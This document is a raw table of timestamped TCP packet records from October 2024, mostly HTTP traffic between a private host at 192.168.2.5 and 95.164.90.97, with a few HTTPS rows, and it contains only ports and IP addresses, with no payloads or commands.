Oct 8, 2024 20:47:29.733386993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733397961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733407021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.733409882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733419895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733419895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.733433962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733436108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.733443022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733462095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.733481884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.755565882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.755635977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.755671978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.755671024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.755706072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.755759954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.755810022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.755820036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.755820036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.755820036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.755844116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.755875111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.755908966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.755963087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.755990028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.755990028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.755996943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.756000996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.756030083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.756063938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.756076097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.756097078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.756108046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.756129980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.756140947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.756166935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.756172895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.756201982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.756206989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.756236076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.756247044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.756268978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.756279945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.756305933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.756314039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.756347895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.781032085 CEST	443	49816	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.783842087 CEST	49816	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.783859015 CEST	443	49816	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.784228086 CEST	49816	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.784231901 CEST	443	49816	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.817188978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817265034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.817361116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817406893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.817435980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817446947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817482948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.817583084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817615986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817635059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.817651987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817662001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.817686081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817694902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.817728043 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.817738056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817770004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817783117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.817802906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817815065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.817837954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817847967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.817872047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817883015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.817915916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.817965031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.817997932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818011045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818031073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818039894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818059921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818083048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818104029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818106890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818159103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818171978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818198919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818207026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818243027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818253040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818284988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818299055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818317890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818329096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818353891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818362951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818399906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818468094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818516016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818519115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818551064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818562031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818584919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818594933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818619013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818624973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818651915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818661928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818685055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818695068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818717957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818728924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818753958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818763971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818799019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818914890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.818964958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.818968058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819000959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819005013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819035053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819046021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819067955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819077969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819112062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819118023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819150925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819160938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819184065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819195986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819217920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819222927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819253922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819304943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819473982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819510937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819528103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819545031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819555044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819577932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819586992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819612026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819622993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819644928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819654942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819679022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819689989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819713116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819722891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819746971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819756031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819777966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819787979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819812059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819818974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819844961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819858074 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819881916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.819890022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.819926023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820074081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820106983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820123911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820147991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820158005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820190907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820199013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820226908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820235014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820260048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820271015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820293903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820305109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820305109 CEST	443	49817	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.820326090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820336103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820358992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820369959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820391893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820401907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820441008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820446968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820475101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820485115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820508003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820517063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820542097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820548058 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820576906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820580959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820615053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820708990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820741892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820754051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820774078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820795059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820830107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820849895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820863008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820869923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820905924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820914984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820949078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820955992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.820981979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.820988894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821017027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821022987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821049929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821058989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821086884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821094036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821105003 CEST	49817	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.821120977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821151018 CEST	443	49817	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.821155071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821177959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821190119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821207047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821223021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821230888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821255922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821260929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821293116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821296930 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821327925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821333885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821361065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821367025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821393967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821398973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821428061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821434021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821461916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821468115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821496010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821501017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821528912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821535110 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821563959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.821568012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821604967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.821784973 CEST	49817	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.821799994 CEST	443	49817	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.840343952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.840363026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.840373039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.840516090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.840610981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.840622902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.840632915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.840646029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.840666056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.840683937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.844053984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.844063997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.844074965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.844108105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.844124079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.844141006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.844151974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.844161987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.844173908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.844186068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.844211102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.888083935 CEST	443	49816	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.889097929 CEST	443	49816	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.889158964 CEST	49816	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.889357090 CEST	49816	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.889357090 CEST	49816	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.889378071 CEST	443	49816	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.889388084 CEST	443	49816	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.892213106 CEST	49821	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.892303944 CEST	443	49821	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.892390013 CEST	49821	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.892532110 CEST	49821	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.892560959 CEST	443	49821	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.905652046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.905692101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.905704021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.905725002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.905814886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.905826092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.905838013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.905848980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.905874014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.905874014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.905900955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.905900955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.906075001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906085968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906096935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906109095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906120062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906126022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.906132936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906145096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906153917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.906157970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906169891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906171083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.906197071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.906218052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.906517982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906529903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906542063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906553030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906563997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.906564951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906575918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906583071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.906589031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906599998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906608105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.906613111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906625032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.906625986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.906651974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.906676054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.906991959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907001972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907015085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907028913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907036066 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907041073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907052994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907064915 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907082081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907094955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907104969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907107115 CEST	80	49755	95.164.90.97	192.168.2.5
